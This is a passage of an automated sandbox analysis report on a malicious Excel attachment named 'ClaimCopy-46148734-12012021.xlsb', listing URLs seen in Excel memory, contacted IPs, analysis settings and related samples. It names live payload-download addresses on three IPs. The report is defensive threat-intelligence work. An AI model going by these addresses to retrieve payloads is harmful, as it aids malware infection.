                                                                                        https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FacebookqEXCEL.EXE, 00000001.00000003.622996638.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564819624.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599473071.000000000F47E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754138462.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292418003.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.741498759.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.618708910.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.604793944.000000000F47D000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620001254.000000000F47D000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          https://login.windows.net/common/oauth2/authorizeaEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://wus2.contentsync.EXCEL.EXE, EXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                            • URL Reputation: safe
                                                                                            		unknown
                                                                                            https://login.windows.net/common/oauth2/authorizedEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                              		high
                                                                                              https://clients.config.office.net/user/v1.0/ios3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                		high
                                                                                                https://login.windows.net/common/oauth2/authorizegEXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  https://login.windows.net/common/oauth2/authorizeXEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    https://login.windows.net/common/oauth2/authorizeZEXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      https://o365auditrealtimeingestion.manage.office.comEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                        		high
                                                                                                        https://clients.config.office.net/user/v1.0/macw/EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          https://outlook.office365.com/api/v1.0/me/ActivitiesEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                            		high
                                                                                                            https://login.windows.net/common/oauth2/authorizePEXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              https://clients.config.office.net/user/v1.0/android/policies3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                                		high
                                                                                                                https://login.windows.net/common/oauth2/authorizeREXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  https://graph.windows.net/lSEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    https://sr.outlook.office.net/ws/speech/recognize/assistant/workhttps://login.windows.net/common/oauEXCEL.EXE, 00000001.00000003.289477836.0000000012BBE000.00000004.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      https://entitlement.diagnostics.office.comEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                                        		high
                                                                                                                        https://dataservice.o365filtering.comsyzEXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        		unknown
                                                                                                                        https://login.windows.net/common/oauth2/authorizeHEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonEXCEL.EXE, EXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                                            		high
                                                                                                                            https://login.windows.net/common/oauth2/authorizeIEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              https://login.windows.net/common/oauth2/authorizeJEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                https://outlook.office.com/EXCEL.EXE, 00000001.00000002.751574667.000000000D65E000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289495071.0000000012AA6000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                                                  		high
                                                                                                                                  https://login.windows.net/common/oauth2/authorizeKEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    https://learningtools.onenote.com/learningtoolsapi/v2.0/GetFreeformSpeechBearerEXCEL.EXE, 00000001.00000003.289415064.0000000012BD6000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289286361.0000000012B76000.00000004.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://storage.live.com/clientlogs/uploadlocationEXCEL.EXE, 00000001.00000002.754583225.0000000012A70000.00000004.00000001.sdmp, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                                                        		high
                                                                                                                                        https://login.windows.net/common/oauth2/authorizeNEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://login.windows.net/common/oauth2/authorizeOEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://powerlift.acompli.netUEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://login.windows.net/common/oauth2/authorizeCEXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://substrate.office.com/search/api/v1/SearchHistoryEXCEL.EXE, 3B184E9E-87D6-40D5-A02C-4CE115A663F4.1.drfalse
                                                                                                                                                		high
                                                                                                                                                https://login.windows.net/common/oauth2/authorizeEEXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://login.windows.net/common/oauth2/authorizeFEXCEL.EXE, 00000001.00000002.754987472.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.620691632.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.624148832.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.564561059.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.602315328.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.599159898.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.292051604.0000000012BFB000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.659948937.0000000012BE9000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.289358432.0000000012C05000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000002.754502820.00000000129FF000.00000004.00000001.sdmp, EXCEL.EXE, 00000001.00000003.660814670.0000000012BF8000.00000004.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://purl.oclc.org/ooxml/drawingml/tableUEXCEL.EXE, 00000001.00000002.751492725.000000000D63C000.00000004.00000001.sdmpfalse
                                                                                                                                                      		high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      94.140.114.63
                                                                                                                                                      		unknownLatvia
                                                                                                                                                      		43513NANO-ASLVfalse
                                                                                                                                                      146.19.170.39
                                                                                                                                                      		unknownFrance
                                                                                                                                                      		7726FITC-ASUSfalse
                                                                                                                                                      185.106.123.73
                                                                                                                                                      		unknownNetherlands
                                                                                                                                                      		60117HSAEfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                                                                                                                      Analysis ID:532405
                                                                                                                                                      Start date:02.12.2021
                                                                                                                                                      Start time:08:31:01
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 8m 12s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:ClaimCopy-46148734-12012021.xlsb
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Run name:Potential for more IOCs and behavior
                                                                                                                                                      Number of analysed new started processes analysed:23
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal76.expl.evad.winXLSB@13/6@0/3
                                                                                                                                                      EGA Information:Failed
                                                                                                                                                      HDC Information:Failed
                                                                                                                                                      HCA Information:
                                                                                                                                                      • Successful, ratio: 100%
                                                                                                                                                      • Number of executed functions: 0
                                                                                                                                                      • Number of non-executed functions: 0
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xlsb
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 52.109.32.63, 52.109.12.22, 52.109.88.40
                                                                                                                                                      • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, prod-w.nexus.live.com.akadns.net, config.officeapps.live.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, nexus.officeapps.live.com, displaycatalog.mp.microsoft.com, officeclient.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      94.140.114.63ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63/970570982083.dat2
                                                                                                                                                      ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63/252721981979.dat2
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63/275357943433.dat2
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63/978921912550.dat2
                                                                                                                                                      146.19.170.39ClaimCopy-46148734-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39/882070564739.dat2
                                                                                                                                                      ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39/970570982083.dat2
                                                                                                                                                      ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39/252721981979.dat2
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39/275357943433.dat2
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 146.19.170.39/978921912550.dat2
                                                                                                                                                      185.106.123.73ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.106.123.73/970570982083.dat2
                                                                                                                                                      ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.106.123.73/252721981979.dat2
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.106.123.73/275357943433.dat2
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 185.106.123.73/978921912550.dat2

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      NANO-ASLVClaimCopy-46148734-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63
                                                                                                                                                      ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63
                                                                                                                                                      ClaimCopy-1485093510-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63
                                                                                                                                                      ClaimCopy-1603117211-12012021.xlsbGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.63
                                                                                                                                                      NkvaVLGroWGet hashmaliciousBrowse
                                                                                                                                                      • 83.241.57.84
                                                                                                                                                      date1%3fBNLv65=pAAS.dllGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.61
                                                                                                                                                      PO-0377409-029.xlsGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.115.0
                                                                                                                                                      5AHyELsVLZ.exeGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.115.160
                                                                                                                                                      1B0DAF8B1B8A09AE26A72E30FA638B000A991A7DFAF7C.exeGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.115.160
                                                                                                                                                      3ObdCtrussGet hashmaliciousBrowse
                                                                                                                                                      • 85.254.18.140
                                                                                                                                                      lbbXpFFkIN.exeGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.115.152
                                                                                                                                                      eNrYzJWFvBGet hashmaliciousBrowse
                                                                                                                                                      • 83.241.94.64
                                                                                                                                                      GU5kmLwV7r.exeGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.115.194
                                                                                                                                                      peSZa2MV75.exeGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.115.194
                                                                                                                                                      Comprobante de pago.docGet hashmaliciousBrowse
                                                                                                                                                      • 141.136.0.32
                                                                                                                                                      Comprobante de pago (OCT).xlsGet hashmaliciousBrowse
                                                                                                                                                      • 141.136.0.32
                                                                                                                                                      qO7zg5QKAX.exeGet hashmaliciousBrowse
                                                                                                                                                      • 94.140.114.128
                                                                                                                                                      SCahhGpqlTGet hashmaliciousBrowse
                                                                                                                                                      • 83.241.82.55
                                                                                                                                                      epEWIyE6GYGet hashmaliciousBrowse
                                                                                                                                                      • 83.241.70.50
